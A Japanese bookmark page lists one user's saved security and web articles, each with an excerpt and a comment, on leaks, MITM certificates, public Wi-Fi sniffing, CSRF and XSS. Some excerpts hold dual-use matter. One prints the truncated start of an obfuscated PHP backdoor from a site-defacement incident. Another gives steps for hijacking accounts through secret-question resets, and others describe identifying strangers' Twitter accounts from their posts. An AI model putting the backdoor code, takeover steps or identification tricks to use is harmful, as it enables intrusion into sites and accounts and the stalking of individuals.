タグ

SecurityとWebに関するtetzlのブックマーク (27)

  • 「Amazonの個人情報や購買情報は流出している」はマジでした。 - canadieの日記

    結果から先に書くと、即答に近い形で個人情報が漏れた。購買情報に関しては聞いてもないのに勝手に教えてくれた。 予想より反響が大きかったので文末にgmailを使った対策を追記した。 なお、米Amazonと同様、数日遅れて問い合わせ内容についてのメールが来たので追記しました。 Amazonのカスタマーサービス経由でアカウント情報が流出したことが判明 - GIGAZINE http://gigazine.net/news/20160125-amazon-customer-service-backdoor/ こーんな記事があったものだから、嘘くせえと思って実際に(英語めんどくさいので日の)カスタマーサービスにチャットで問い合わせてみた。いうまでもなく、ソーシャル・エンジニアリングはクラックの基である。セキュリティにうるさいAmazon社がこんなにザルなわけがないと思ったからだ。 なお、ニセの住所

    「Amazonの個人情報や購買情報は流出している」はマジでした。 - canadieの日記
    tetzl
    tetzl 2016/01/26
    チャット担当者さんの権限設定が(良い意味で)謎な回答だな…|マイナンバーもそうだけど、IDに類するものは真名と同じで秘する方が良いんだろうねえ
  • Superfish/eDellRootが危険な理由 - めもおきば

    Lenovo製のPCの一部にSuperfishというマルウェアが標準でインストールされていることが確認され、大きな問題となっています。 [2015-11-24追記] DELL製のPCにも、「eDellRoot」とされるSuperfishと同様の問題を持つルート証明書が導入されているようです。 DellPCに不審なルート証明書、LenovoのSuperfishと同じ問題か - ITmedia エンタープライズ Dude, You Got Dell’d: Publishing Your Privates - Blog - Duo Security Joe Nord personal blog: New Dell computer comes with a eDellRoot trusted root certificate https://t.co/chURwV7eNE eDellRootで

    Superfish/eDellRootが危険な理由 - めもおきば
    tetzl
    tetzl 2015/02/20
    「特に一般利用者向けのMITMは腹を切って死ぬべきだという立場です。なぜならそのリスクを利用者に十分に説明することが現実的では無いから」激しく同意
  • 脆弱性発見のプロ「キヌガワ マサト」さんは日本人だった

    脆弱性を見つけてセキュリティ対策に貢献しているのが、「バグハンター」と呼ばれる存在だ。Googleなどベンダーの報奨金で生計を立てているという「キヌガワ マサト」さんが、プロのバグハンターとしての“愉しみ”を紹介してくれた。 ソフトウェアのバグや脆弱性は、軽微な不具合からセキュリティ上の深刻な問題を引き起こすものまで、様々なものがある。開発者が幾ら注意しても脆弱性をなくすことは非常に難しいが、外部の立場から脆弱性を見つけてセキュリティ対策に貢献する「バグハンター」という存在をご存じだろうか。 GoogleMicrosoft、サイボウズなど一部のベンダーは、脆弱性を報告したバグハンターに報奨金などを支払う制度を運営。その報奨金で生計を立てるプロの一人が「キヌガワ マサト」さんだ。12月18、19日に行われたセキュリティカンファレンス「CODE BLUE」では、キヌガワさんがプロのバグハンタ

    脆弱性発見のプロ「キヌガワ マサト」さんは日本人だった
    tetzl
    tetzl 2014/12/22
    漫画的というか、いっそ村上春樹的な感じした。ライ麦畑のキャッチャーでもありそうだし。
  • カフェで写真撮ってツイートしてる人のアカウントを特定する方法

    よくカフェとかレストランで「カシャ♪」ってケータイで写真撮った後に なにやらメッセージを添えてどこかに送信してるような人っているじゃない? そういう人のアカウントを特定できたら面白いよねー ・・・今回はそんな方法を紹介するというライフハック。 ただ先に言っておくと、そもそも相手が実はTwitterを使ってない!っていうとアウト 送信先が友達へのメールでもアウト LINEだったりしてもアウト なので、必ず出来る!・・・とは言い切れない。 まー、せいぜい10回やって1度できるかどうかくらいの割合なので、レストランで料理が出てくるまでの時間つぶし程度のネタと思って大目に見てほしい。 肝心の方法の説明・・・の前にお店の名前とか、料理の名前・名物メニューとか話題の定番メニューが分かるなら、それで検索してみて素直にヒットするならそこで完了! 検索ワードのチョイスは推理力というか、もしも自分がそのお店を

    カフェで写真撮ってツイートしてる人のアカウントを特定する方法
    tetzl
    tetzl 2014/10/08
    画像付きtweetのみ検索とな|狭い範囲のSNSから時間差で公開していくとか
  • フェイスブックで乗っ取り被害相次ぐ NHKニュース

    世界最大の交流サイト「フェイスブック」の利用者のIDが何者かに乗っ取られ、その友人たちに通信販売のサイトを紹介する書き込みが送られる被害が相次いでいることが分かりました。 こうした通販サイトは、偽ブランド品などを扱っているとみられ、セキュリティー会社が注意を呼びかけています。 セキュリティー会社などによりますと、ことし7月ごろから、フェイスブックの国内の利用者のIDが何者かに乗っ取られ、その友人らに、ブランド品の安売りサイトを紹介する書き込みを送られる被害が相次いでいます。 こうした通販サイトは、偽のブランド品を扱っていたり、代金を支払っても商品が届かない悪質なサイトとみられるということです。 先月、乗っ取りの被害にあった東京都内の20代の女性は「ブランド品のサングラスを大幅な割引価格で購入できる」という内容の書き込みを、およそ100人の友人に向けて送られたということです。 この女性は「ま

    フェイスブックで乗っ取り被害相次ぐ NHKニュース
    tetzl
    tetzl 2014/09/29
    いやこれアプリ認証経由とかでは…|なんかもう「パスワードを使いまわさないなどの対策」というのがセキュリティ案件ニュースの「何卒宜しくお願い致します」みたいな意味のない結語になっている気がした
  • Wiresharkで公衆無線LANのヤバさを確認してみた

    私(@honeniq)の個人ブログです。日々の生活の中で感じた諸々のことから、 人さまにお見せできるような上澄み部分を抽出して投稿しています。 前置き ここ数年の携帯キャリアやコンビニ業界の頑張りで、町中に公衆無線LANのAPが溢れていますが、あれって安全なんでしょうか?盗聴される的な観点で。 パスワード無しのノーガードAPは論外としても、 契約者にだけWPAキーを教える((けど、利用者が多すぎて公開しているも同然の))タイプ APにはキー無しで入ることができ、Webアクセスをすると認証ページにリダイレクトするタイプ よく見かけるこの2タイプもやヤバそう。 試してみる前の認識 無線である以上は、自分が飛ばした電波は誰でも傍受できる。じゃあ暗号化して中身が分からないようにしましょう、ってなるけど、1つ目のタイプみたいに不特定多数の人が同じWPAキーを知っている場合、暗号化してもあんまり意味な

  • 自分の個人情報がどこから流出したかが丸わかりになる、Gmailの機能が凄い!個人情報漏洩対策として、登録先ごとに個別設定してみよう。 - クレジットカードの読みもの

    近年、日常茶飯事になりつつある個人情報の漏えい事件。 ベネッセや日航空の事例などなど、セキュリティ意識の高い大手企業であっても個人情報流出を防ぐことが出来ないわけですから、対策にお金をかけられない中小企業や個人商店からの流出は、もはや星の数ほど発生してると考えるのが自然…。 酷いケースだと企業側が流出に気付けない場合すらあることを考えると、住所、氏名、電話番号、クレジットカード情報といった大切な個人情報は自分自身で守るほかないのかもしれません。 大量の情報漏えい: ニュースになるので気付きやすい&企業側からの連絡が期待できる 小規模な情報漏えい: 被害者が少ないので気付きにくい&場合によっては流出したことすら通知すらされない(そもそも企業側が流出を認識できていないことも) では、どうすれば個人情報流出から身を守ることが出来るのか? 今回は参考までに、自分が登録した個人情報がどこから流出し

    自分の個人情報がどこから流出したかが丸わかりになる、Gmailの機能が凄い!個人情報漏洩対策として、登録先ごとに個別設定してみよう。 - クレジットカードの読みもの
    tetzl
    tetzl 2014/07/15
    +と@の間をクレンジングしたらDBぶっ壊れるコマンドになるメアドはよ|さくらとかムームーの月数十円~百円レベルのアドレス無制限サービスでhatena+hatena@みたいなアドレスを都度生成するというのはどうだ
  • LINEの「パスワード変更したらスタンププレゼント」キャンペーンは、長い目で見ると実はかなりマズい

    最近SNS上で話題になっていたのが、LINEの乗っとり騒動。ただ、LINEのサービス自体から情報が流出したわけではなく、他のサービス等と共有しているメールアドレスとパスワードの組み合わせで不正ログインをされているようだ。 そこでLINEが行ったのが、「パスワード変更した方全員にLINEキャラ特製スタンププレゼント」という、こちらのキャンペーン。 メールアドレスやパスワードを設定/変更する面倒さを、スタンプというインセンティブで乗り越えられるという、LINEにとってもユーザーにとってもwin-winの施策だ。よく考えたなぁ! …と思っていた。以下のツイートを見るまでは。 一見有効なように見えるけど、LINEパスワード入力したらスタンプもらえるって情弱に誤学習させてしまって、フィッシングサイト乱立する気もする http://t.co/XWiYWDrfed — oʇoɯıɥsɐɥ oɥs (@s

    LINEの「パスワード変更したらスタンププレゼント」キャンペーンは、長い目で見ると実はかなりマズい
    tetzl
    tetzl 2014/07/05
    ソーシャルハックに対する脆弱性って善良さから来ているような気がしていてうむむむ
  • “遠隔操作ウイルス”事件、専門家らは実行ファイルの扱いでギャップ痛感? 

    tetzl
    tetzl 2012/10/19
    企業PCを踏み台化というのは、それこそレガシーな環境でアップデートもできないような、リース一括導入したりしてるとこで甘ければ怖いよなあ…。
  • いちばん簡単なアカウントの乗っ取り方 - ぼくはまちちゃん!

    こんにちはこんにちは!! 最近また、アカウントを乗っ取られただとか、ハッキングされたとか、 そういう話をちょくちょく聞くようになってきて物騒な世の中ですね>< そこで、ぼくの考える「いちばん簡単なアカウントの乗っ取り方」について ちょっと書いておきたいと思います! 1. 「パスワードを忘れた」をクリック 2. 「秘密の質問に答える」をクリック 3. ペットの名前や、好きな映画を聞かれるので、対象者のSNSやブログを調べる・または直接聞く 4. アカウントゲット さすがに最近は「秘密の質問」を使っているWebサービスは減ってきたけど、まだまだ結構あるんですよね。 これって人によっては、ものすごく脆弱な仕組みだと思うので、こんなもの早く絶滅すればいいのになーと思ってます。 日記になんでもかんでも書いちゃうような、いわゆる情弱さんなんかは、これで高い確率で乗っ取れるし、 ネットに慣れた人でも、過

    いちばん簡単なアカウントの乗っ取り方 - ぼくはまちちゃん!
    tetzl
    tetzl 2012/10/05
    秘密の質問を必須にしてるとこと住所フォームに何も書いてないくせに送信ボタン押したら「全角で入力してください」ってだすとこは許し難い
  • 最新版クレジットカードおすすめランキング!すぐに使えるのはこれ!

    この記事では、最新版クレジットカードおすすめランキング10選について解説します。 クレジットカードは、商品を購入する際に所持金がなくても後から代金が支払えるカードです。 ポイント還元などさまざまな特典があるクレジットカードですが、カードによって特徴が異なるため、あなたに合うクレジットカードを選択するのは容易ではありません。 この記事で分かること オススメクレジットカードを口コミや年会費、ポイント還元率で選出 ポイント還元率が0.5%以上は還元率がよい ポイントアップがあるクレジットカードはポイントが貯まりやすい クレジットカードを初めて発行する人は年会費やポイント還元率に注目する 旅行や出張が多い人は旅行傷害保険が手厚いクレジットカードを選択する セキュリティを重要視する人はナンバーレスカードを選択する 2枚目のクレジットカードを作成する際は1枚目にない特典があるカードを選択する それぞれ

    最新版クレジットカードおすすめランキング!すぐに使えるのはこれ!
    tetzl
    tetzl 2012/09/25
    「そいつはすべてのテーマのfunctions.phpを書き換えてくれやがりました」リアルにバーチャル「軒を貸して母屋を取られる」状態。。
  • 【Twitter実験】つぶやきだけで個人を特定できるのか? | オモコロ

    こんにちは、セブ山です。 みなさんはTwitterでどんなつぶやきをしていますか? おそらく、今日の予定をつぶやいたり、ランチの写真をアップしたり、あなたの「今」を仲の良い友達に向けてつぶやいていることでしょう。 しかし、当にそのツイートはあなたの友達だけが見ているのでしょうか? もし、知らない誰かにあなたのつぶやきを覗かれていたとしたら…? つぶやいた内容を手掛かりに個人を特定されてしまうかもしれませんよ!? 今回は、そんな個人情報垂れ流し社会に警鐘を鳴らす実験をおこないます!! ■ルール説明 1.Twitterの検索機能を使って「渋谷なう」とつぶやいているアカウントを探します。 2.「渋谷なう」の検索結果をもとに、さらに詳細な個人情報を垂れ流しているアカウントを割り出します。 3.そのアカウントのつぶやきをこっそり監視して、個人を特定し、実際に捕まえるためにハンター(セブ山)が渋谷の

    【Twitter実験】つぶやきだけで個人を特定できるのか? | オモコロ
    tetzl
    tetzl 2012/03/14
    「ベランダからの写真」あたりも結構怖いと思っていたりする
  • 脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて

    改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn

  • スマートフォンの“熱”を悪用、「Bit-Squatting」による情報漏えいの脅威

    メールアドレスの入力ミスによるメール誤送信など、人的ミスが原因で発生する情報漏えい事故は少なくない。 では人的ミスを防げば情報漏えい対策として十分なのだろうか。ネットワンシステムズのサービス事業グループFellowである山崎文明氏は、「人的ミスだけではなく、“ハードウェアレベルのエラー”による情報漏えいの危険性に目を向けるべきだ」と警告する。 稿は、ハードウェアエラーを巧みに利用する「Bit-Squatting」と呼ばれる攻撃手法を中心に、その実態と対策を解説する。 関連記事 情報漏えいの原因は人的ミスによるものが大多数、規制は「暗号化」で 止まらない情報漏えい事故、中堅企業が取るべきセキュリティ対策は?

    スマートフォンの“熱”を悪用、「Bit-Squatting」による情報漏えいの脅威
    tetzl
    tetzl 2012/01/05
    Bit-Squattingってなんか低線量被曝の遺伝子損傷みたいな話だなとか思った。ないに越したことはないだろうけど実際表現型に出てくるのはどの程度なんだよ、みたいな。
  • ハッキング(笑)の研究してるけれど質問ある? - ゴールデンタイムズ

    1 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 07:52:02.95 ID:ULW0dTK40 はいはい厨二厨二 10 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 07:56:49.53 ID:rAyb58Mj0 大学の研究? 19 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 08:03:18.20 ID:ULW0dTK40 >>10 大学の特別研究員もやってるけれど、今はメインは自宅研究員ですお 3 : 忍法帖【Lv=40,xxxPT】 :2011/11/09(水) 07:53:09.89 ID:WgNHOLRk0 レインボーアタックについて分かりやすく教えて 7 :以下、名無しにかわりましてVIPがお送りします :2011/11/09(水) 07:55:28.35 I

    tetzl
    tetzl 2011/11/10
    ひろみちゅさん…
  • “日本は特殊な国”か、通信を可視化してみたら意外な事実が分かった

    例えばFacebookやTwitterなどのソーシャルサービスは、実際にどれくらい国内企業ネットで使われているのか---。大手ファイアウォールベンダーの米パロアルトネットワークスは、半年に一度、世界中のユーザー企業を対象に大規模なトラフィック調査を実施し、様々なデータを収集および分析している。来日した調査担当者に、日の国内企業におけるトラフィック傾向などについて話を聞いた。 まずは調査の概要について教えてほしい。 2008年から約半年に1回の割合で、世界中のユーザー企業を対象にトラフィック調査を実施している。最新のデータは2011年5月に実施した調査で得たもので、調査対象となった企業の数は全世界で合計1253社、そのうち日の企業は87社入っている。調査対象企業の数は回を重ねるごとに大きく増えており、前回(2010年10月)は723社、前々回(2010年3月)は347社だった。具体的な企

    “日本は特殊な国”か、通信を可視化してみたら意外な事実が分かった
    tetzl
    tetzl 2011/08/18
    「日本人はいったい1日にどれほどたくさん会社ではてブしているんだ!」という話ではなかった
  • mixi足あと廃止に寄せて - 最速転職研究会 | コメント mixiって今ほとんどがモバイルでアクセスされてたはずだけど、スマホ以外のガラケーでもこの問題が起きるの?

    mixiが6年以上に渡って放置してきた足あと機能を使って訪問者の個人特定が可能な脆弱性を修正した。簡単に説明するとmixi以外のサイトからでもユーザーに気付かれずに、その人のmixiアカウントを特定するということが出来たが、出来なくなった。(正確にはユーザーが気付いたとしても特定された後) アダルトサイトが訪問者のmixiアカウント収集したり、ワンクリック詐欺サイトがmixiアカウント特定して追い込みかけたり、知らない人からメッセージ送られてきてURL開いたらmixiアカウント特定されてたり、そういうことが今まで出来ていたのが出来なくなった。 過去にもいろんな人が言及してるし、すでに終わった議論だと思ってる人もいるだろう。世間一般にどれぐらい認知されていたのかはよく分からないが、少なくとも技術者やセキュリティ研究者の間ではよく知られている問題だった。 http://internet.kil

    mixi足あと廃止に寄せて - 最速転職研究会 | コメント mixiって今ほとんどがモバイルでアクセスされてたはずだけど、スマホ以外のガラケーでもこの問題が起きるの?
    tetzl
    tetzl 2011/08/18
    小さな問題を大きなリスクとして認識する一方、本当に大きなリスクに対してはよくわからないので気にしないというよくある傾向が見えるような、とかちょっと思った。
  • Togetter - 「PixivのシステムによるユーザID漏洩とパスロックの未実装とadminツールについて」

    サさん @sayamm17 *とぎゃ見る時間ない人用のまとめ* ピクシブ問題の流れ:ログイン用ID各個人のイラストページで丸出しになってる事が判明⇒パスロック制限が無い事が判明(何度ログイン失敗してもログインを止められる事がない)⇒阿鼻叫喚⇒プレ垢クレカ情報を消しに走る⇒消せず⇒騒ぎが大きくなる 2011-08-09 10:26:17 サさん @sayamm17 続き:pixiv自体の管理者ログインページがなぜかwwwに(通常ハッキング防止に社内のみのアクセスしか受付けないようイントラネットにあるはず)⇒更に炎上⇒マシン状態を表示する文言がなぜかデフォの「It works!」ではなく「It workssl!」になっている(8/4取得情報) 2011-08-09 10:31:41

    Togetter - 「PixivのシステムによるユーザID漏洩とパスロックの未実装とadminツールについて」
  • webアプリケーションの脆弱性とは? - OKWAVE

    こんにちは! 「フォームを勝手にサブミットしてしまう」 その認識でだいたいあってます!たぶん! そのmixiの例だと、 入力画面 → (送信1) → 確認画面 → (送信2) → 完了 ってなるわけですが、 いくら確認画面が間にあったところで、 (送信2)の部分を「勝手にサブミット」しちゃえばいいわけです。 ※ただし今のmixiや、ちゃんとしたwebサービスは送信時にトークンをつけるとかCSRF対策してるのでできません 実際の攻撃の例としては、mixiやtwitterなどの多くの人が繋がっている投稿型サイトで、 「こんにちはこんにちは!! このリンク先すごいよ! http://~」 のような書き込みをしておき、 そのリンク先でformJavaScript等で「自動的に勝手にサブミット」してしまいます。 画面には何も表示されなくてもかまいません。 そしてさらに勝手に書き込む内容を 「こんに

    webアプリケーションの脆弱性とは? - OKWAVE
    tetzl
    tetzl 2011/06/03
    「実際の攻撃の例としては」ってw 「こわいですね。」ってw
  • Evernote XSS事件のエクスプロイトとその対策過程と顛末 | uuu

    Evernoteに任意のHTMLを注入できる脆弱性がありました。 http://togetter.com/li/125281 Evernoteセキュリティポリシーとかには触れず、とりあえず何が可能だったのか、どういう状況だったのかを書きます。 4/18 16時ごろ Evernoteの登録ページのHTMLに以下のような記述があります。 <script type="text/javascript"> $(document).ready(function() { suggestedTags = []; suggestedNotebook = ""; sourceUrl = ""; providerName = ""; payload = { "user" : { ... }, ..後略.. </script> このsourceUrl = ""の部分、https://www.evernote.c

    tetzl
    tetzl 2011/04/21
    「何かあればなりふり構わずに対策する、という姿勢は信頼できるものじゃないかなと思います」